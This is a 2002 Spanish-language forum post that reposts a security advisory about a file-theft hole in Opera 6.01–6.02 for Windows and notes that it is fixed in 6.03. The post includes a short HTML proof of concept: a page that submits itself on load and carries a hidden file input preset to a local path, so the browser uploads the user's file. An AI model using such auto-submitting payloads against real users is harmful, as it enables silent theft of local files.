Foros del Web » Administración de Sistemas » Seguridad y redes »

Agujero de seguridad OPERA...

Estas en el tema de Agujero de seguridad OPERA... en el foro de Seguridad y redes en Foros del Web. Navegando encontre esto... espero les sirva.. byes... Cita: Una vulnerabilidad en las versiones 6.01 y 6.02 del navegador Opera para Windows hace posible para intrusos ...
  #1 (permalink)  
Antiguo 30/05/2002, 22:20
Avatar de ramiro  
Fecha de Ingreso: agosto-2001
Ubicación: PE
Mensajes: 562
Antigüedad: 23 años, 4 meses
Puntos: 0
Agujero de seguridad OPERA...

Navegando encontre esto... espero les sirva..
byes...


Cita:
Una vulnerabilidad en las versiones 6.01 y 6.02 del navegador Opera para Windows hace posible para intrusos obtener, por conducto de un sitio web, ficheros del sistema local del usuario.

El mayor problema radica en que la intrusión no requiere interacción alguna por parte del usuario. “La vulnerabilidad más devastadora encontrada en Opera hasta ahora”, comenta la compañía de seguridad informática GreyMagic Software.

El problema radica en la forma en que Opera gestiona los envíos de formularios que implican transferencias vía HTTP. Normalmente, el sistema debería presentar una ventana de advertencia en que se indica que se iniciará una transferencia de ficheros. Sin embargo, en este caso es posible evitar el cuadro de diálogo mediante el código HTML y, de esa forma, simular que no hay transferencia alguna.

Tal simulación es en extremo sencilla y sólo requiere insertar el siguiente código en un sitio web:
Código:
 
<body onload="document.secForm.submit()"> 
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm"> 
<input type="file" name="expFile" value="c:\test.txt
" style="visibility:hidden"> 
</form>
</body>
El formulario es transmitido entonces junto con el fichero solicitado.

Opera Software informa que el problema ha sido corregido en la última versión, número 6.03, de su navegador.
mas info en...

<a href='ir.asp?http://sec.greymagic.com/news/' target='_blank'>http://sec.greymagic.com/news/...</a>

ciao..



<center>
Quieres Informacion sobre Cusco - Perú - Machupicchu?[/I]<br><a href="http://www.infocusco.com">infocusco.com</a>
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 20:30.